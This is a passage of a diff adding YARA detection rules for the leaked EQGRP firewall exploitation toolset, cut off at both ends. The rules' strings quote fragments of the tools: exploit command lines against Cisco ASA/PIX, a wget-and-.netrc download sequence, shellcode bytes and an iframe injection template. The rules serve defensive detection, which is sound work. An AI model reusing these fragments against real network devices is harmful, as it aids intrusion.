+      tags = "APT, DEMO, T1040"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "-s/--srcip <sourceIP>  Use given source IP (if sniffer doesn't collect source IP)" fullword ascii
+      $x2 = "convert an XML file generated by the BLATSTING sniffer module into a pcap capture file." fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_BananaAid_RID2D82 : APT DEMO T1105 {
+   meta:
+      description = "EQGRP Toolset Firewall - file BananaAid"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:34:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7a4fb825e63dc612de81bc83313acf5eccaa7285afc05941ac1fef199279519f"
+      tags = "APT, DEMO, T1105"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "(might have to delete key in ~/.ssh/known_hosts on linux box)" fullword ascii
+      $x2 = "scp BGLEE-" ascii
+      $x3 = "should be 4bfe94b1 for clean bootloader version 3.0; " fullword ascii
+      $x4 = "scp <configured implant> <username>@<IPaddr>:onfig" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_SecondDate_2211_RID2F32 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - file SecondDate-2211.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:46:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2337d0c81474d03a02c404cada699cf1b86c3c248ea808d4045b86305daa2607"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SD_processControlPacket" fullword ascii
+      $s2 = "Encryption_rc4SetKey" fullword ascii
+      $s3 = ".got_loader" fullword ascii
+      $s4 = "^GET.*(?:/ |\\.(?:htm|asp|php)).*\\r\\n" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 200KB and all of them )
+}
+
+rule APT_EQGRP_config_jp1_UA_RID2F08 : APT DEMO {
+   meta:
+      description = "EQGRP Toolset Firewall - file config_jp1_UA.pl"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:39:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2f50b6e9891e4d7fd24cc467e7f5cfe348f56f6248929fec4bbee42a5001ae56"
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "This program will configure a JETPLOW Userarea file." fullword ascii
+      $x2 = "Error running config_implant." fullword ascii
+      $x3 = "NOTE:  IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION " fullword ascii
+      $x4 = "First IP address for beacon destination [127.0.0.1]" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_BUSURPER_3001_724_RID2ECA : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - file BUSURPER-3001-724.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:29:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6b558a6b8bf3735a869365256f9f2ad2ed75ccaa0eefdc61d6274df4705e978b"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "IMPLANT" fullword ascii
+      $s2 = "KEEPGOING" fullword ascii
+      $s3 = "upgrade_implant" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 200KB and 2 of them ) or ( all of them )
+}
+
+rule APT_EQGRP_workit_RID2CD3 : APT DEMO SCRIPT T1105 {
+   meta:
+      description = "EQGRP Toolset Firewall - file workit.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:05:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fb533b4d255b4e6072a4fa2e1794e38a165f9aa66033340c2f4f8fd1da155fac"
+      tags = "APT, DEMO, SCRIPT, T1105"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "macdef init > /tmp/.netrc;" fullword ascii
+      $s2 = "/usr/bin/wget http://" fullword ascii
+      $s3 = "HOME=/tmp ftp" fullword ascii
+      $s4 = " >> /tmp/.netrc;" fullword ascii
+      $s5 = "/usr/rapidstream/bin/tftp" fullword ascii
+      $s6 = "created shell_command:" fullword ascii
+      $s7 = "rm -f /tmp/.netrc;" fullword ascii
+      $s8 = "echo quit >> /tmp/.netrc;" fullword ascii
+      $s9 = "echo binary >> /tmp/.netrc;" fullword ascii
+      $s10 = "chmod 600 /tmp/.netrc;" fullword ascii
+      $s11 = "created cli_command:" fullword ascii
+   condition: 
+      6 of them
+}
+
+rule APT_EQGRP_tinyhttp_setup_RID3047 : APT DEMO FILE SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file tinyhttp_setup.sh"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 12:33:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3d12c83067a9f40f2f5558d3cf3434bbc9a4c3bb9d66d0e3c0b09b9841c766a0"
+      tags = "APT, DEMO, FILE, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "firefox http://127.0.0.1:8000/$_name" fullword ascii
+      $x2 = "What is the name of your implant:" fullword ascii
+      $x3 = "killall thttpd" fullword ascii
+      $x4 = "copy http://<IP>:80/$_name flash:/$_name" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 2KB and 1 of ( $x* ) ) or ( all of them )
+}
+
+rule APT_EQGRP_shellcode_RID2DE6 : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file shellcode.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:51:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ac9decb971dd44127a6ca0d35ac153951f0735bb4df422733046098eca8f8b7f"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "execute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00" ascii
+      $s2 = "tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00" ascii
+      $s3 = "auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07" ascii
+      $c1 = { e8 00 00 00 00 5d be ef be ad de 89 f7 89 ec 29 f4 b8 03 00 00 00 } 
+      $c3 = { 31 c0 b0 03 31 db 89 e1 31 d2 b6 f0 b2 0d cd 80 3d ff ff ff ff 75 07 } 
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_EPBA_RID2B4B : APT DEMO FILE SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file EPBA.script"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 09:00:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "53e1af1b410ace0934c152b5df717d8a5a8f5fdd8b9eb329a44d94c39b066ff7"
+      tags = "APT, DEMO, FILE, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 " fullword ascii
+      $x2 = "-t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP" fullword ascii
+      $x3 = "./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP" fullword ascii
+      $x4 = "--target_vers=TARGET_VERS    target Pix version (pix712, asa804) (REQUIRED)" fullword ascii
+      $x5 = "-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port" fullword ascii
+      $x6 = "this operation is complete, BananaGlee will" fullword ascii
+      $x7 = "cd /current/bin/FW/BGXXXX/Install/LP" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2023 and filesize < 7KB and 1 of ( $x* ) ) or ( 3 of them )
+}
+
+rule APT_EQGRP_BPIE_RID2B53 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - file BPIE-2201.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 09:01:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "697e80cf2595c85f7c931693946d295994c55da17a400f2c9674014f130b4688"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "profProcessPacket" fullword ascii
+      $s2 = ".got_loader" fullword ascii
+      $s3 = "getTimeSlotCmdHandler" fullword ascii
+      $s4 = "getIpIpCmdHandler" fullword ascii
+      $s5 = "LOADED" fullword ascii
+      $s6 = "profStartScan" fullword ascii
+      $s7 = "tmpData.1" fullword ascii
+      $s8 = "resetCmdHandler" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 70KB and 6 of ( $s* ) )
+}
+
+rule APT_EQGRP_jetplow_SH_RID2E32 : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file jetplow.sh"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:04:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ee266f84a1a4ccf2e789a73b0a11242223ed6eba6868875b5922aea931a2199c"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow" fullword ascii
+      $s2 = "***** Please place your UA in /current/bin/FW/OPS *****" fullword ascii
+      $s3 = "ln -s ../jp/orig_code.bin orig_code_pixGen.bin" fullword ascii
+      $s4 = "*****             Welcome to JetPlow              *****" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_BBANJO_RID2BDF : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - file BBANJO-3011.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 09:25:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f09c2f90464781a08436321f6549d350ecef3d92b4f25b95518760f5d4c9b2c3"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "get_lsl_interfaces" fullword ascii
+      $s2 = "encryptFC4Payload" fullword ascii
+      $s3 = ".got_loader" fullword ascii
+      $s4 = "beacon_getconfig" fullword ascii
+      $s5 = "LOADED" fullword ascii
+      $s6 = "FormBeaconPacket" fullword ascii
+      $s7 = "beacon_reconfigure" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 50KB and all of them )
+}
+
+rule APT_EQGRP_BPATROL_2201_RID2D6B : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - file BPATROL-2201.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:31:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "aa892750b893033eed2fedb2f4d872f79421174eb217f0c34a933c424ae66395"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "dumpConfig" fullword ascii
+      $s2 = "getstatusHandler" fullword ascii
+      $s3 = ".got_loader" fullword ascii
+      $s4 = "xtractdata" fullword ascii
+      $s5 = "KEEPGOING" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 40KB and all of them )
+}
+
+rule APT_EQGRP_extrabacon_RID2E5A : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:10:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "59d60835fe200515ece36a6e87e642ee8059a40cb04ba5f4b9cce7374a3e7735"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "To disable password checking on target:" fullword ascii
+      $x2 = "[-] target is running" fullword ascii
+      $x3 = "[-] problem importing version-specific shellcode from" fullword ascii
+      $x4 = "[+] importing version-specific shellcode" fullword ascii
+      $s5 = "[-] unsupported target version, abort" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_sploit_py_RID2E16 : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file sploit.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:59:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "the --spoof option requires 3 or 4 fields as follows redir_ip" ascii
+      $x2 = "[-] timeout waiting for response - target may have crashed" fullword ascii
+      $x3 = "[-] no response from health check - target may have crashed" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_BICECREAM_RID2CAE : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - file BICECREAM-2140"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 09:59:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4842076af9ba49e6dfae21cf39847b4172c06a0bd3d2f1ca6f30622e14b77210"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Could not connect to target device: %s:%d. Please check IP address." fullword ascii
+      $s2 = "command data size is invalid for an exec cmd" fullword ascii
+      $s3 = "A script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but ma" ascii
+      $s4 = "Execute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]" fullword ascii
+      $s5 = "Execute 0x%08x with args (%08x, %08x, %08x): [y/n]" fullword ascii
+      $s6 = "[%d] Execute code." fullword ascii
+      $s7 = "Execute 0x%08x with args (%08x): [y/n]" fullword ascii
+      $s8 = "dump_value_LHASH_DOALL_ARG" fullword ascii
+      $s9 = "Eggcode is complete. Pass execution to it? [y/n]" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 5000KB and 2 of them ) or ( 5 of them )
+}
+
+rule APT_EQGRP_create_http_injection_RID32E8 : APT DEMO FILE SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file create_http_injection.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 14:25:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "de52f5621b4f3896d4bd1fb93ee8be827e71a2b189a9f8552b68baed062a992d"
+      tags = "APT, DEMO, FILE, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "required by SECONDDATE" fullword ascii
+      $s1 = "help='Output file name (optional). By default the resulting data is written to stdout.')" fullword ascii
+      $s2 = "data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"" ascii
+      $s3 = "version='%prog 1.0'," fullword ascii
+      $s4 = "usage='%prog [ ... options ... ] url'," fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 3KB and ( $x1 or 2 of them ) ) or ( all of them )
+}
+
+rule APT_EQGRP_BFLEA_2201_RID2CB1 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - file BFLEA-2201.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:00:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "15e8c743770e44314496c5f27b6297c5d7a4af09404c4aa507757e0cc8edc79e"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".got_loader" fullword ascii
+      $s2 = "LOADED" fullword ascii
+      $s3 = "readFlashHandler" fullword ascii
+      $s4 = "KEEPGOING" fullword ascii
+      $s5 = "flashRtnsPix6x.c" fullword ascii
+      $s6 = "fix_ip_cksum_incr" fullword ascii
+      $s7 = "writeFlashHandler" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 30KB and 5 of them ) or ( all of them )
+}
+
+rule APT_EQGRP_BpfCreator_RHEL4_RID2FD9 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - file BpfCreator-RHEL4"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 12:14:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "bd7303393409623cabf0fcf2127a0b81fae52fe40a0d2b8db0f9f092902bbd92"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "usage %s \"<tcpdump pcap string>\" <outfile>" fullword ascii
+      $s2 = "error reading dump file: %s" fullword ascii
+      $s3 = "truncated dump file; tried to read %u captured bytes, only got %lu" fullword ascii
+      $s4 = "%s: link-layer type %d isn't supported in savefiles" fullword ascii
+      $s5 = "DLT %d is not one of the DLTs supported by this device" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 2000KB and all of them )
+}
+
+rule APT_EQGRP_StoreFc_RID2CE9 : APT DEMO SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file StoreFc.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:09:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f155cce4eecff8598243a721389046ae2b6ca8ba6cb7b4ac00fd724601a56108"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Usage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the conf" ascii
+      $x2 = "raise Exception, \"Must supply both a config file and implant file.\"" fullword ascii
+      $x3 = "This is wrapper for Store.py that FELONYCROWBAR will use. This" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule APT_EQGRP_hexdump_RID2D2E : APT DEMO FILE SCRIPT {
+   meta:
+      description = "EQGRP Toolset Firewall - file hexdump.py"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:20:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "95a9a6a8de60d3215c1c9f82d2d8b2640b42f5cabdc8b50bd1f4be2ea9d7575a"
+      tags = "APT, DEMO, FILE, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "def hexdump(x,lead=\"[+] \",out=sys.stdout):" fullword ascii
+      $s2 = "print >>out, \"%s%04x  \" % (lead,i)," fullword ascii
+      $s3 = "print >>out, \"%02X\" % ord(x[i+j])," fullword ascii
+      $s4 = "print >>out, sane(x[i:i+16])" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 1KB and 2 of ( $s* ) ) or ( all of them )
+}
+
+rule APT_EQGRP_BBALL_RID2B90 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 09:11:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "498fc9f20b938b8111adfa3ca215325f265a08092eefd5300c4168876deb7bf6"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.S" fullword ascii
+      $s2 = ".got_loader" fullword ascii
+      $s3 = "handler_readBIOS" fullword ascii
+      $s4 = "cmosReadByte" fullword ascii
+      $s5 = "KEEPGOING" fullword ascii
+      $s6 = "checksumAreaConfirmed.0" fullword ascii
+      $s7 = "writeSpeedPlow.c" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 40KB and 4 of ( $s* ) ) or ( all of them )
+}
+
+rule APT_EQGRP_BARPUNCH_BPICKER_RID2EE5 : APT DEMO FILE T1083 {
+   meta:
+      description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:34:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+      hash2 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
+      tags = "APT, DEMO, FILE, T1083"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u" fullword ascii
+      $x2 = "%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]" fullword ascii
+      $x3 = "* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)" fullword ascii
+      $x4 = "%s version %s already has persistence installed. If you want to uninstall," fullword ascii
+      $x5 = "The active module(s) on the target are not meant to be persisted" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 6000KB and 1 of them ) or ( 3 of them )
+}
+
+rule APT_EQGRP_Implants_Gen6_RID2F2A : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:45:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+      hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+      hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "LP.c:pixSecurity - Improper number of bytes read in Security/Interface Information" fullword ascii
+      $s2 = "LP.c:pixSecurity - Not in Session" fullword ascii
+      $s3 = "getModInterface__preloadedModules" fullword ascii
+      $s4 = "showCommands" fullword ascii
+      $s5 = "readModuleInterface" fullword ascii
+      $s6 = "Wrapping_Not_Necessary_Or_Wrapping_Ok" fullword ascii
+      $s7 = "Get_CMD_List" fullword ascii
+      $s8 = "LP_Listen2" fullword ascii
+      $s9 = "killCmdList" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 6000KB and all of them )
+}
+
+rule APT_EQGRP_Implants_Gen5_RID2F29 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:45:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+      hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+      hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Module and Implant versions do not match.  This module is not compatible with the target implant" fullword ascii
+      $s1 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log" fullword ascii
+      $s2 = "%s/BF_%04d%02d%02d.log" fullword ascii
+      $s3 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and 1 of ( $x* ) ) or ( all of them )
+}
+
+rule APT_EQGRP_BananaUsurper_writeJetPlow_RID34B9 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 15:42:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
+      hash2 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Implant Version-Specific Values:" fullword ascii
+      $x2 = "This function should not be used with a Netscreen, something has gone horribly wrong" fullword ascii
+      $s1 = "createSendRecv: recv'd an error from the target." fullword ascii
+      $s2 = "Error: WatchDogTimeout read returned %d instead of 4" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 2000KB and 1 of ( $x* ) ) or ( 3 of them )
+}
+
+rule APT_EQGRP_Implants_Gen4_RID2F28 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:45:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+      hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+      hash3 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Command has not yet been coded" fullword ascii
+      $s2 = "Beacon Domain  : www.%s.com" fullword ascii
+      $s3 = "This command can only be run on a PIX/ASA" fullword ascii
+      $s4 = "Warning! Bad or missing Flash values (in section 2 of .dat file)" fullword ascii
+      $s5 = "Printing the interface info and security levels. PIX ONLY." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 3000KB and 3 of them ) or ( all of them )
+}
+
+rule APT_EQGRP_Implants_Gen3_RID2F27 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 11:45:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
+      hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+      hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "incomplete and must be removed manually.)" fullword ascii
+      $s1 = "%s: recv'd an error from the target." fullword ascii
+      $s2 = "Unable to fetch the address to the get_uptime_secs function for this OS version" fullword ascii
+      $s3 = "upload/activate/de-activate/remove/cmd function failed" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 6000KB and 2 of them ) or ( all of them )
+}
+
+rule APT_EQGRP_BLIAR_BLIQUER_RID2E10 : APT DEMO FILE {
+   meta:
+      description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230"
+      author = "Florian Roth"
+      reference = "Research"
+      date = "2016-08-16 10:58:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
+      hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+      tags = "APT, DEMO, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
